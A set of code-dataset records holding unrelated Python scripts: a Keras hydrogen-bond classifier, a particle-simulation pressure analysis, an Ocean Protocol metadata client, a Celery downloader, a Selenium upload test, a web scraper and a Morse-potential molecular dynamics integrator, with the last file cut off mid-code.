for x in output_hbond:\n for i in range( 0, len(x) ):\n if x[i] > 0:\n print( \"Some hbond value is positive! \" + str(x[i]) )\n exit( 1 )\n if x[i] != 0:\n x[i] = 1\n \n for x in input:\n normalize_single_input( x )\n \n return input, output_hbond\n\ndef evaluate_model( model, best_score_so_far, test_input, test_output_hbond, batch ):\n num_positives_actual = 0.\n num_positives_predicted = 0.\n num_positives_actual_and_predicted = 0.\n\n num_negatives_actual = 0.\n num_negatives_predicted = 0.\n num_negatives_actual_and_predicted = 0.\n \n predictions = model.predict( x=test_input );\n\n for i in range( 0, len(test_input) ):\n\n actual = test_output_hbond[ i ][ 0 ]\n prediction = predictions[ i ][ 0 ]\n\n if actual == 0:\n num_negatives_actual += 1\n if prediction < 0.5:\n num_negatives_predicted += 1\n num_negatives_actual_and_predicted += 1\n else:\n num_positives_predicted += 1\n else:\n num_positives_actual += 1\n if prediction < 0.5:\n num_negatives_predicted += 1\n else:\n num_positives_actual_and_predicted += 1\n num_positives_predicted += 1\n\n min = 1;\n score1 = num_positives_actual_and_predicted/num_positives_actual\n score2 = num_negatives_actual_and_predicted/num_negatives_actual\n if score1 < min:\n min = score1\n if score2 < min:\n min = score2\n\n saved = 0\n\n if min >= best_score_so_far:\n best_score_so_far = min\n model.save( \"best.h5\" )\n saved = 1\n\n print( str(x) + \" \" + str(score1) + \" \" + str(score2) + \" \" + str(saved) )\n\n return best_score_so_far\n\n\n#https://stackoverflow.com/questions/4601373/better-way-to-shuffle-two-numpy-arrays-in-unison\ndef shuffle_in_unison(a, b):\n rng_state = numpy.random.get_state()\n numpy.random.shuffle(a)\n numpy.random.set_state(rng_state)\n numpy.random.shuffle(b)\n\n###########\n# CLASSES #\n###########\nclass LossHistory(keras.callbacks.Callback):\n def on_train_begin(self, logs={}):\n self.losses = []\n\n def on_batch_end(self, batch, logs={}):\n self.losses.append(logs.get('loss'))\n\n###########\n# METRICS #\n###########\n\ndef mean_pred( y_true, y_pred ):\n return K.mean( y_pred )\n\n#########\n# START #\n#########\n\n# 1) Define Filenames\ntraining_input_file = \"training.dat\"\ntesting_input_file = \"testing.dat\"\n\ntraining_input, training_output_hbond = generate_data_from_file( training_input_file )\ntesting_input, testing_output_hbond = generate_data_from_file( testing_input_file )\n\n# 2) Define Model\n\nnum_input_dimensions = 9\nmodel = Sequential()\n\nmodel.add( Dense( num_neurons_in_first_hidden_layer, input_dim=num_input_dimensions, activation='relu') )\n\nfor x in range( 0, num_intermediate_hidden_layers ):\n model.add( Dense( num_neurons_in_intermediate_hidden_layer, activation='relu') )\n\nnum_neurons_in_final_layer = int( 1 )\nmodel.add( Dense( num_neurons_in_final_layer, activation='sigmoid') )\n\n# 3) Compile Model\n\nmetrics_to_output=[ 'accuracy' ]\nmodel.compile( loss='binary_crossentropy', optimizer='adam', metrics=metrics_to_output )\n\n# 4) Fit Model\nbest_score_so_far = 0\n\nfor x in range( 0, num_epochs ):\n start = time.time()\n print( \"Beginning epoch: \" + str(x) )\n \n shuffle_in_unison( training_input, training_output_hbond )\n\n i=0\n while i < len(training_input):\n j = len(training_input) - i\n if j > 100000:\n j = 100000\n i += 100000\n\n model.train_on_batch( x=training_input[ i : i+j ], y=training_output_hbond[ i : i+j ], class_weight={ 0 : 1, 1 : weight1 } )\n\n if ( x % 10 == 0 ):\n best_score_so_far = evaluate_model( model, best_score_so_far, testing_input, testing_output_hbond, x )\n\n end = time.time()\n print( \"\\tseconds: \" + str( end - start ) )\n\n\n\nbest_score_so_far = evaluate_model( model, best_score_so_far, cached_testing_input, cached_training_output_hbond, num_epochs )\n","sub_path":"FirstTrainingRunLongLeaf/Run.test_on_kelso.py","file_name":"Run.test_on_kelso.py","file_ext":"py","file_size_in_byte":7461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"93399933","text":"'''\n# This is an 80 character line #\nCompute the pressure that corresponds to the LJ potential:\n -identify liquid bulk particles\n -identify gas bulk particles\n -compute area of dense bulk\n -compute area of all dense phase particles\n -compute area of gas bulk (exclude edge)\n -sum stress tensor for liquid\n -sum stress tensor for gas\n'''\n\nimport sys\n\n# Run locally\nsys.path.append('/Users/kolbt/Desktop/compiled/hoomd-blue/build')\nsys.path.append('/Users/kolbt/Desktop/compiled/gsd/build')\n# Run on the cpu\nsys.path.append('/nas/longleaf/home/kolbt/programs/cpu-hoomd/hoomd-blue/build')\n# Run on the gpu\nsys.path.append('/nas/longleaf/home/kolbt/programs/hoomd_2.2.1/hoomd-blue/build')\nsys.path.append('/nas/longleaf/home/kolbt/programs/gsd/build')\n\nimport gsd\nfrom gsd import hoomd\nfrom gsd import pygsd\n\nimport freud\nfrom freud import parallel\nfrom freud import box\nfrom freud import density\nfrom freud import cluster\n\nimport numpy as np\nimport math\nimport random\nfrom scipy import stats\n\nimport matplotlib\n#matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport matplotlib.collections\nfrom matplotlib import colors\nimport matplotlib.gridspec as gridspec\nimport matplotlib.patches as patches\n\ndef computeTauPerTstep(epsilon, mindt=0.000001):\n '''Read in epsilon, output tauBrownian per timestep'''\n# if epsilon != 1.:\n# mindt=0.00001\n kBT = 1.0\n tstepPerTau = float(epsilon / (kBT * mindt))\n return 1. / tstepPerTau\n\ndef roundUp(n, decimals=0):\n '''Round up size of bins to account for floating point inaccuracy'''\n multiplier = 10 ** decimals\n return math.ceil(n * multiplier) / multiplier\n \ndef getNBins(length, minSz=(2**(1./6.))):\n \"Given box size, return number of bins\"\n initGuess = int(length) + 1\n nBins = initGuess\n # This loop only exits on function return\n while True:\n if length / nBins > minSz:\n return nBins\n else:\n nBins -= 1\n\ndef findBins(lookN, currentInd, maxInds):\n '''Get the surrounding bin indices'''\n maxInds -= 1\n left = currentInd - lookN\n right = currentInd + lookN\n binsList = []\n for i in range(left, right):\n ind = i\n if i > maxInds:\n ind -= maxInds\n binsList.append(ind)\n return binsList\n\n# Get infile and open\ninFile = str(sys.argv[1])\nif inFile[0:7] == \"cluster\":\n add = 'cluster_'\nelse:\n add = ''\n \nf = hoomd.open(name=inFile, mode='rb')\n# Inside and outside activity from command line\npeA = float(sys.argv[2])\npeB = float(sys.argv[3])\nparFrac = float(sys.argv[4])\neps = float(sys.argv[5])\ntry:\n phi = float(sys.argv[6])\n intPhi = int(phi)\n phi /= 100.\nexcept:\n phi = 0.6\n intPhi = 60\n\n# Outfile to write data to\noutFile = add + 'pressure_pa' + str(peA) +\\\n '_pb' + str(peB) +\\\n '_xa' + str(parFrac) +\\\n '_phi' + str(intPhi) +\\\n '_ep' + '{0:.3f}'.format(eps) +\\\n '.txt'\n \ng = open(outFile, 'w') # write file headings\ng.write('Timestep'.center(10) + ' ' +\\\n 'Liquid'.center(10) + ' ' +\\\n 'liqN'.center(10) + ' ' +\\\n 'liqArea'.center(10) + ' ' +\\\n 'Gas'.center(10) + ' ' +\\\n 'gasN'.center(10) + ' ' +\\\n 'gasArea'.center(10) + '\\n')\ng.close()\n\nstart = 0 # first frame to process\ndumps = int(f.__len__()) # get number of timesteps dumped\nend = dumps # final frame to process\nstart = end - 1\n\nbox_data = np.zeros((1), dtype=np.ndarray) # box dimension holder\nr_cut = 2**(1./6.) # potential cutoff\ntauPerDT = computeTauPerTstep(epsilon=eps) # brownian time per timestep\n\nwith hoomd.open(name=inFile, mode='rb') as t:\n snap = t[0]\n first_tstep = snap.configuration.step\n box_data = snap.configuration.box\n l_box = box_data[0]\n h_box = l_box / 2.\n typ = snap.particles.typeid\n partNum = len(typ)\n # Set up cluster computation using box\n f_box = box.Box(Lx=l_box, Ly=l_box, is2D=True)\n my_clust = cluster.Cluster()\n c_props = cluster.ClusterProperties()\n # Compute each mesh\n NBins = getNBins(l_box, r_cut)\n sizeBin = roundUp((l_box / NBins), 6)\n \n # Loop through each timestep\n for j in range(start, end):\n snap = t[j]\n # Easier accessors\n pos = snap.particles.position # position\n pos[:,-1] = 0.0\n xy = np.delete(pos, 2, 1)\n typ = snap.particles.typeid # type\n tst = snap.configuration.step # timestep\n tst -= first_tstep # normalize by first timestep\n tst *= tauPerDT # convert to Brownian time\n \n # Compute clusters for this timestep\n system = freud.AABBQuery(f_box, f_box.wrap(pos))\n \n # Compute neighbor list for only largest cluster\n my_clust.compute(system, neighbors={'r_max': 1.0})\n ids = my_clust.cluster_idx # get id of each cluster\n c_props.compute(system, ids) # find cluster properties\n clust_size = c_props.sizes # find cluster sizes\n # Minimum size to be considered the dense phase\n minSize = 5000\n \n # Refine our choice of the dense phase, only particles with six neighbors\n gasPos = []\n liqPos = []\n print(\"Getting positions of liquid and gas... \")\n for k in range(0, len(ids)):\n if clust_size[ids[k]] >= minSize:\n liqPos.append(pos[k])\n elif clust_size[ids[k]] <= 100:\n gasPos.append(pos[k])\n \n # Cluster these data and refine\n subSys = freud.AABBQuery(f_box, f_box.wrap(liqPos))\n nlist = subSys.query(liqPos,\n dict(num_neighbors=6,\n exclude_ii=True,\n r_max=1.0,\n r_min=0.2)).toNeighborList()\n neigh = nlist.neighbor_counts\n \n # Loop through nlist to get my reduced 'bulk' particles\n bulkPos = []\n print(\"Getting positions of bulk liquid... \")\n for k in range(0, len(neigh)):\n if neigh[k] >= 6:\n bulkPos.append(liqPos[k])\n \n # Let's plot this positional data to see what particles we're taking\n allx = pos[:, 0]\n ally = pos[:, 1]\n bulkx = list(list(zip(*bulkPos))[0])\n bulky = list(list(zip(*bulkPos))[1])\n gasx = list(list(zip(*gasPos))[0])\n gasy = list(list(zip(*gasPos))[1])\n plt.scatter(allx, ally, c='k', s=0.5, edgecolor='none')\n plt.scatter(bulkx, bulky, c='r', s=0.5, edgecolor='none')\n plt.scatter(gasx, gasy, c='b', s=0.5, edgecolor='none')\n ax = plt.gca()\n ax.axis('equal')\n plt.show()\n \n \n \n# # Get the positions of all particles in LC\n# binParts = [[[] for b in range(NBins)] for a in range(NBins)]\n# liqPos = []\n# for k in range(0, len(ids)):\n# if ids[k] in liqIDs:\n# liqPos.append(pos[k])\n# # Convert position to be > 0 to place in list mesh\n# tmp_posX = pos[k][0] + h_box\n# tmp_posY = pos[k][1] + h_box\n# x_ind = int(tmp_posX / sizeBin)\n# y_ind = int(tmp_posY / sizeBin)\n# # Append particle id to appropriate bin\n# binParts[x_ind][y_ind].append(k)\n#\n# elif ids[k] in gasIDs:\n#\n#\n# # If sufficient neighbor bins are empty, we have an edge\n# thresh = 1.5\n# # Loop through x index of mesh\n# for ix in range(0, len(occParts)):\n#\n# # If at right edge, wrap to left\n# if (ix + 1) != NBins:\n# lookx = [ix-1, ix, ix+1]\n# else:\n# lookx = [ix-1, ix, 0]\n#\n# # Loop through y index of mesh\n# for iy in range(0, len(occParts[ix])):\n#\n# # Reset neighbor counter\n# count = 0\n# # If the bin is not occupied, skip it\n# if occParts[ix][iy] == 0:\n# continue\n# # If at top edge, wrap to bottom\n# if (iy + 1) != NBins:\n# looky = [iy-1, iy, iy+1]\n# else:\n# looky = [iy-1, iy, 0]\n#\n# # Loop through surrounding x-index\n# for indx in lookx:\n# # Loop through surrounding y-index\n# for indy in looky:\n#\n# # If neighbor bin is NOT occupied\n# if occParts[indx][indy] == 0:\n# # If neighbor bin shares a vertex\n# if indx != ix and indy != iy:\n# count += 0.5\n# # If neighbor bin shares a side\n# else:\n# count += 1\n#\n# # If sufficient neighbors are empty, we found an edge\n# if count >= thresh:\n# edgeBin[indx][indy] = 1\n#\n# # Sum the resultant edge mesh\n# Nedges = 0\n# for ix in range(0, len(occParts)):\n# for iy in range(0, len(occParts[ix])):\n# Nedges += edgeBin[ix][iy]\n#\n# # The edge length of sufficiently large clusters\n# lEdge = Nedges * sizeBin\n#\n# # Write this to a textfile with the timestep\n# g = open(outFile, 'a')\n# g.write('{0:.3f}'.format(tst).center(10) + ' ')\n# g.write('{0:.1f}'.format(lEdge).center(10) + '\\n')\n# g.close()\n#\n## # A sanity check on a perfect hcp circle\n## print(Nedges)\n## print(Nedges * sizeBin)\n## x = list(list(zip(*lcPos))[0])\n## y = list(list(zip(*lcPos))[1])\n## diam = max(x) - min(x)\n## circ = diam * np.pi\n## print(circ)\n## print(Nedges * sizeBin / circ)\n##\n## # Let's plot imshow to make sure we're good thus far\n## fig, ax = plt.subplots()\n## ax.imshow(edgeBin, extent=[0, l_box, 0, l_box], aspect='auto', origin='lower')\n## ax.set_aspect('equal')\n## plt.show()\n#\n#\n","sub_path":"post_proc/interparticle_pressure_neighbor.py","file_name":"interparticle_pressure_neighbor.py","file_ext":"py","file_size_in_byte":10383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"174675987","text":"#\n# Copyright 2021 Ocean Protocol Foundation\n# SPDX-License-Identifier: Apache-2.0\n#\n\"\"\"\nAquarius module.\nHelp to communicate with the metadata store.\n\"\"\"\n\n# Copyright 2018 Ocean Protocol Foundation\n# SPDX-License-Identifier: Apache-2.0\n\nimport json\nimport logging\n\nfrom ocean_lib.common.ddo.ddo import DDO\nfrom ocean_lib.common.http_requests.requests_session import get_requests_session\n\nlogger = logging.getLogger(\"aquarius\")\n\n\nclass Aquarius:\n \"\"\"Aquarius wrapper to call different endpoint of aquarius component.\"\"\"\n\n def __init__(self, aquarius_url):\n \"\"\"\n The Metadata class is a wrapper on the Metadata Store, which has exposed a REST API.\n\n :param aquarius_url: Url of the aquarius instance.\n \"\"\"\n assert aquarius_url, f'Invalid url \"{aquarius_url}\"'\n # :HACK:\n if \"/api/v1/aquarius/assets\" in aquarius_url:\n aquarius_url = aquarius_url[: aquarius_url.find(\"/api/v1/aquarius/assets\")]\n\n self._base_url = f\"{aquarius_url}/api/v1/aquarius/assets\"\n self._headers = {\"content-type\": \"application/json\"}\n\n logging.debug(f\"Metadata Store connected at {aquarius_url}\")\n logging.debug(f\"Metadata Store API documentation at {aquarius_url}/api/v1/docs\")\n logging.debug(f\"Metadata assets at {self._base_url}\")\n\n self.requests_session = get_requests_session()\n\n @property\n def root_url(self):\n return self._base_url[: self._base_url.find(\"/api/v1/\")]\n\n @property\n def url(self):\n \"\"\"Base URL of the aquarius instance.\"\"\"\n return f\"{self._base_url}/ddo\"\n\n def get_service_endpoint(self):\n \"\"\"\n Retrieve the endpoint with the ddo for a given did.\n\n :return: Return the url of the the ddo location\n \"\"\"\n return f\"{self.url}/\" + \"{did}\"\n\n def list_assets(self):\n \"\"\"\n List all the assets registered in the aquarius instance.\n\n :return: List of DID string\n \"\"\"\n response = self.requests_session.get(self._base_url).content\n asset_list = _parse_response(response, [])\n\n return asset_list\n\n def get_asset_ddo(self, did):\n \"\"\"\n Retrieve asset ddo for a given did.\n\n :param did: Asset DID string\n :return: DDO instance\n \"\"\"\n response = self.requests_session.get(f\"{self.url}/{did}\").content\n parsed_response = _parse_response(response, None)\n\n if not parsed_response:\n return {}\n\n return DDO(dictionary=parsed_response)\n\n def get_asset_metadata(self, did):\n \"\"\"\n Retrieve asset metadata for a given did.\n\n :param did: Asset DID string\n :return: metadata key of the DDO instance\n \"\"\"\n response = self.requests_session.get(f\"{self._base_url}/metadata/{did}\").content\n parsed_response = _parse_response(response, [])\n\n return parsed_response\n\n def list_assets_ddo(self):\n \"\"\"\n List all the ddos registered in the aquarius instance.\n\n :return: List of DDO instance\n \"\"\"\n return json.loads(self.requests_session.get(self.url).content)\n\n def text_search(self, text, sort=None, offset=100, page=1):\n \"\"\"\n Search in aquarius using text query.\n\n Given the string aquarius will do a full-text query to search in all documents.\n\n Currently implemented are the MongoDB and Elastic Search drivers.\n\n For a detailed guide on how to search, see the MongoDB driver documentation:\n mongodb driverCurrently implemented in:\n https://docs.mongodb.com/manual/reference/operator/query/text/\n\n And the Elastic Search documentation:\n https://www.elastic.co/guide/en/elasticsearch/guide/current/full-text-search.html\n Other drivers are possible according to each implementation.\n\n :param text: String to be search.\n :param sort: 1/-1 to sort ascending or descending.\n :param offset: Integer with the number of elements displayed per page.\n :param page: Integer with the number of page.\n :return: List of DDO instance\n \"\"\"\n assert page >= 1, f\"Invalid page value {page}. Required page >= 1.\"\n payload = {\"text\": text, \"sort\": sort, \"offset\": offset, \"page\": page}\n response = self.requests_session.post(\n f\"{self.url}/query\", data=json.dumps(payload), headers=self._headers\n )\n if response.status_code == 200:\n return self._parse_search_response(response.content)\n else:\n raise ValueError(f\"Unable to search for DDO: {response.content}\")\n\n def query_search(self, search_query, sort=None, offset=100, page=1):\n \"\"\"\n Search using a query.\n\n Currently implemented is the MongoDB query model to search for documents according to:\n https://docs.mongodb.com/manual/tutorial/query-documents/\n\n And an Elastic Search driver, which implements a basic parser to convert the query into\n elastic search format.\n\n Example: query_search({\"price\":[0,10]})\n\n :param search_query: Python dictionary, query following mongodb syntax\n :param sort: 1/-1 to sort ascending or descending.\n :param offset: Integer with the number of elements displayed per page.\n :param page: Integer with the number of page.\n :return: List of DDO instance\n \"\"\"\n assert page >= 1, f\"Invalid page value {page}. Required page >= 1.\"\n search_query[\"sort\"] = sort\n search_query[\"offset\"] = offset\n search_query[\"page\"] = page\n response = self.requests_session.post(\n f\"{self.url}/query\", data=json.dumps(search_query), headers=self._headers\n )\n if response.status_code == 200:\n return self._parse_search_response(response.content)\n else:\n raise ValueError(f\"Unable to search for DDO: {response.content}\")\n\n def validate_metadata(self, metadata):\n \"\"\"\n Validate that the metadata of your ddo is valid.\n\n :param metadata: conforming to the Metadata accepted by Ocean Protocol, dict\n :return: bool\n \"\"\"\n response = self.requests_session.post(\n f\"{self.url}/validate\", data=json.dumps(metadata), headers=self._headers\n )\n if response.content == b\"true\\n\":\n return True, []\n else:\n parsed_response = self._parse_search_response(response.content)\n return False, parsed_response\n\n @staticmethod\n def _parse_search_response(response):\n parsed_response = _parse_response(response, None)\n\n if isinstance(parsed_response, dict) or isinstance(parsed_response, list):\n return parsed_response\n\n raise ValueError(\n f\"Unknown search response, expecting a list or dict, got {type(parsed_response)}.\"\n )\n\n\ndef _parse_response(response, default_return):\n if not response:\n return default_return\n\n try:\n return json.loads(response)\n except TypeError:\n return default_return\n except ValueError:\n raise ValueError(response.decode(\"UTF-8\"))\n\n return default_return\n","sub_path":"ocean_lib/common/aquarius/aquarius.py","file_name":"aquarius.py","file_ext":"py","file_size_in_byte":7147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"641278091","text":"from celery import Celery\nimport urllib.request\nimport os\n\n# Where the downloaded files will be stored\nBASEDIR=\"/workspace/app-downloader/downloads\"\n\n# Create the app and set the broker location (RabbitMQ)\napp = Celery('app-downloader',\n backend='rpc://',\n broker='pyamqp://guest@localhost//')\n\n@app.task\ndef download(url, filename):\n \"\"\"\n Download a page and save it to the BASEDIR directory\n url: the url to download\n filename: the filename used to save the url in BASEDIR\n \"\"\"\n response = urllib.request.urlopen(url)\n data = response.read()\n with open(BASEDIR+\"/\"+filename,'wb') as file:\n file.write(data)\n file.close()\n\n@app.task\ndef list():\n \"\"\" Return an array of all downloaded files \"\"\"\n return os.listdir(BASEDIR)\n\n ","sub_path":"app/workspace/app-downloader/app-downloader.py","file_name":"app-downloader.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"592828845","text":"# -*- coding: utf-8 -*-\nfrom time import sleep\n\nfrom selenium_file.Base import Base\n\n\nclass TestFile(Base):\n def test_file_upload(self):\n self.driver.get(\"http://www.baidu.com\")\n self.driver.find_element_by_xpath(\"//*[@id='form']/span[1]/span[1]\").click()\n # 可以通过send.keys可以上传文件,识别上传,添加图片地址\n self.driver.find_element_by_xpath(\"//*[@id='form']/div/div[2]/div[2]/input\").send_keys(\n \"C:/Users/Administrator/Pictures/压缩版panda.png\")\n sleep(3)","sub_path":"selenium_file/test_file.py","file_name":"test_file.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"18421892","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Date : 17/2/16 PM3:58\n# Copyright: TradeShift.com\n__author__ = 'liming'\n\nfrom flask.ext.restful import reqparse\n\ndef get_parser(arguments):\n parser = reqparse.RequestParser()\n for arg in arguments:\n parser.add_argument(arg)\n return parser","sub_path":"lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"146302562","text":"import json\nimport logging\nimport os\nimport shutil\nimport torch\n\n\nclass Params():\n \"\"\"Class that loads hyperparameters from a json file\"\"\"\n\n def __init__(self, json_path):\n with open(json_path) as f:\n params = json.load(f)\n self.__dict__.update(params)\n\n def save(self, json_path):\n with open(json_path, 'w') as f:\n json.dump(self.__dict__, f, indent=4)\n\n def update(self, json_path):\n \"\"\"Loads parameters from json file\"\"\"\n with open(json_path) as f:\n params = json.load(f)\n self.__dict__.update(params)\n\n @property\n def dict(self):\n \"\"\"Gives dict-like access to Params instance by params.dict['learning_rate']\"\"\"\n return self.__dict__\n\n\nclass RunningAverage():\n \"\"\"A simple class that maintains the running average of a quantity\n Example:\n ```\n loss_avg = RunningAverage()\n loss_avg.update(2)\n loss_avg.update(4)\n loss_avg() = 3\n ```\n \"\"\"\n\n def __init__(self):\n self.steps = 0\n self.total = 0\n\n def update(self, val):\n self.total += val\n self.steps += 1\n\n def __call__(self):\n return self.total / float(self.steps)\n\n\ndef set_logger(log_path):\n \"\"\"Set the logger to log info in terminal and file 'log_path' \"\"\"\n\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n if not logger.handlers:\n # Logging to a file\n file_handler = logging.FileHandler(log_path)\n file_handler.setFormatter(logging.Formatter(\n '%(asctime)s:%(levelname)s:%(message)s'))\n logger.addHandler(file_handler)\n\n # Logging to console\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(logging.Formatter('%(message)s'))\n logger.addHandler(stream_handler)\n","sub_path":"Sequence-Models/Name-Entity-Recognition/.ipynb_checkpoints/utils-checkpoint.py","file_name":"utils-checkpoint.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"85609035","text":"from selenium import webdriver\r\nfrom bs4 import BeautifulSoup\r\n\r\nimport time\r\nimport csv\r\n\r\nSTART_URL = \"https://en.m.wikipedia.org/wiki/List_of_brightest_stars_and_other_record_stars\"\r\n\r\nbrowser = webdriver.Chrome(r\"C:\\Users\\Subramaniam\\Dropbox\\My PC (LAPTOP-499770CL)\\Downloads\\Pro-127\\chromedriver.exe\")\r\nbrowser.get(START_URL)\r\ntime.sleep(10)\r\nShining_stars = []\r\nheaders = [\"V_Mag.\", \"proper_name\", \"bayer_designation\", \"distance\", \"spectral_class\", \"mass\", \"radius\", \"luminosity\"]\r\n\r\ndef Scrape(): \r\n for i in range(0, 439):\r\n soup = BeautifulSoup(browser.page_source, \"html.parser\")\r\n for ul_tag in soup.find_all(\"ul\", attrs = {\"class\", \"List_of_brightest_stars_and_other_record_stars\"}):\r\n li_tags = ul_tag.find_all(\"li\")\r\n temp_list = []\r\n for index, li_tag in enumerate(li_tags):\r\n if index == 0:\r\n temp_list.append(li_tag.find_all(\"a\")[0].contents[0])\r\n else:\r\n try:\r\n temp_list.append(li_tag.contents[0])\r\n except:\r\n temp_list.append(\"\")\r\n Shining_stars.append(temp_list)\r\n browser.find_element_by_xpath('//*[@id=\"primary_column\"]/footer/div/div/div/nav/span[2]/a').click()\r\n with open(\"scrapper_2.csv\", \"w\") as f: \r\n csvwriter = csv.writer(f)\r\n csvwriter.writerow(headers)\r\n csvwriter.writerow(Shining_stars)\r\n\r\nScrape() ","sub_path":"Pro-127/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"403045675","text":"'''\r\nSymplectic Euler time integration of 2 particles\r\ninteracting under a morse potential in 3D euclidean space.\r\n\r\nProduces plots of the relative seperations of the particles\r\nand the total energy, both as functions of time.\r\nAlso saves these to file.\r\n'''\r\n\r\nimport sys\r\nimport math\r\nimport numpy as np\r\nimport matplotlib.pyplot as pyplot\r\nfrom Particle3D import Particle3D\r\n\r\ndef force_dw(p1, p2, a, D, r):\r\n \"\"\"\r\n Method to return the morse force between 2 particles.\r\n Force on particle1 is given by\r\n F(p1, p2) = -2aD(1-exp[-a(mod(p1-p2)-r)])exp[-a(mod(p1-p2)-r)](p1-p2)\r\n\r\n :param p1: position of particle 1 in 3D euclidean space given by Numpy array\r\n :param p2: position of particle 2 in 3D euclidean space given by Numpy array\r\n :param a: parameter a system specific, read in from file\r\n :param D: parameter D system specific, read in from file\r\n :param r: parameter r system specific, read in from file\r\n :return: force acting on particle as Numpy array\r\n \"\"\"\r\n exponent = math.exp(-a*(np.linalg.norm(p1.position-p2.position)- r))\r\n force = -2*a*D*(1-exponent)*exponent*((p1.position-p2.position)/np.linalg.norm(p1.position-p2.position))\r\n return force\r\n\r\ndef pot_energy_dw(p1, p2, a, D, r):\r\n \"\"\"\r\n Method to return the morse potential energy\r\n of 2 particles at p1 and p2\r\n V(p1, p2) = D*((1-exp[-a(mod(p1-p2)-r)])^2 -1)\r\n\r\n :param p1: position of particle 1 in 3D euclidean space given by Numpy array\r\n :param p2: position of particle 2 in 3D euclidean space given by Numpy array\r\n :param a: parameter a system specific, read in from file\r\n :param D: parameter D system specific, read in from file\r\n :param r: parameter r system specific, read in from file\r\n :return: potential energy of pair as float\r\n \"\"\"\r\n exponent = math.exp(-a*(np.linalg.norm(p1.position-p2.position)- r))\r\n potential = D*((1 -exponent)**2 -1)\r\n return potential\r\n\r\n# Begin main code\r\ndef main():\r\n\r\n # Read name of output file from command line\r\n if len(sys.argv)!=2:\r\n print(\"Wrong number of arguments.\")\r\n print(\"Usage: \" + sys.argv[0] + \" \")\r\n quit()\r\n else:\r\n outfile_name = sys.argv[1]\r\n\r\n # Open output file\r\n outfile = open(outfile_name, \"w\")\r\n\r\n #read in initial conditions from appropriate files\r\n file_handle = open(\"N2_input.txt\",\"r\")\r\n p1 = Particle3D.from_file(file_handle)\r\n p2 = Particle3D.from_file(file_handle)\r\n settings = open(\"N2_potential_settings.txt\", \"r\")\r\n a = float(settings.readline())\r\n D = float(settings.readline())\r\n r = float(settings.readline())\r\n\r\n #Set up simulation parameters\r\n dt = 0.014\r\n numstep = 110\r\n time = 0.0\r\n\r\n #Calculate seperation vector and absolute value of it\r\n seperation = np.linalg.norm(p1.position - p2.position)\r\n vector_sep = Particle3D.vector_seperation(p1, p2)\r\n\r\n # Write out initial conditions\r\n energy = p1.kinetic_energy() + p2.kinetic_energy() + pot_energy_dw(p1, p2, a, D, r)\r\n outfile.write(\"{0:f} {1:f} {2:f} {3:f} {4:12.8f}\\n\".format(time, vector_sep[0], vector_sep[1], vector_sep[2], energy))\r\n\r\n\r\n # Initialise data lists for plotting later\r\n time_list = [time]\r\n pos_list = [seperation]\r\n energy_list = [energy]\r\n\r\n # Start the time integration loop\r\n\r\n for i in range(numstep):\r\n # Update particle position and seperation\r\n p1.leap_pos1st(dt)\r\n p2.leap_pos1st(dt)\r\n seperation = np.linalg.norm(p1.position - p2.position)\r\n vector_sep = Particle3D.vector_seperation(p1, p2)\r\n\r\n # Calculate force\r\n force1 = force_dw(p1, p2, a, D, r)\r\n force2 = -force1\r\n\r\n # Update particle velocity\r\n p1.leap_velocity(dt, force1)\r\n p2.leap_velocity(dt, force2)\r\n\r\n # Increase time\r\n time = time + dt\r\n\r\n # Output particle information\r\n energy = p1.kinetic_energy() +p2.kinetic_energy() + pot_energy_dw(p1, p2, a, D, r)\r\n outfile.write(\"{0:f} {1:f} {2:f} {3:f} {4:12.8f}\\n\".format(time, vector_sep[0], vector_sep[1], vector_sep[2], energy))\r\n\r\n # Append information to data lists\r\n time_list.append(time)\r\n pos_list.append(seperation)\r\n energy_list.append(energy)\r\n\r\n # Post-simulation:\r\n # Close output file\r\n outfile.close()\r\n\r\n # Plot particle trajectory to screen\r\n pyplot.title('Symplectic Euler: Seperation vs time')\r\n pyplot.xlabel('Time, 10.18fs')\r\n pyplot.ylabel('Seperation, Angstroms')\r\n pyplot.plot(time_list, pos_list)\r\n pyplot.show()\r\n\r\n # Plot particle energy to screen\r\n pyplot.title('Symplectic Euler: Total Energy vs Time')\r\n pyplot.xlabel('Time, 10.18fs')\r\n pyplot.ylabel('Energy, eV')\r\n pyplot.plot(time_list, energy_list)\r\n pyplot.show()\r\n\r\n\r\n# Execute main method:\r\nmain()\r\n","sub_path":"symplecticEuler3D.py","file_name":"symplecticEuler3D.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"373810580","text":"#/usr/bin/python\n#coding:UTF-8\nimport RPi.GPIO as GPIO\nimport time\n\nclass _Getch:\n \"\"\"Gets a single character from standard input. Does not echo to the\nscreen.\"\"\"\n def __init__(self):\n try:\n self.impl = _GetchWindows()\n except ImportError:\n self.impl = _GetchUnix()\n\n def __call__(self): return self.impl()\n\n\nclass _GetchUnix:\n def __init__(self):\n import tty, sys\n\n def __call__(self):\n import sys, tty, termios\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\n\nclass _GetchWindows:\n def __init__(self):\n import msvcrt\n\n def __call__(self):\n import msvcrt\n return msvcrt.getch()\n\n# getch = _Getch()\n# x = getch()\n#\n# if 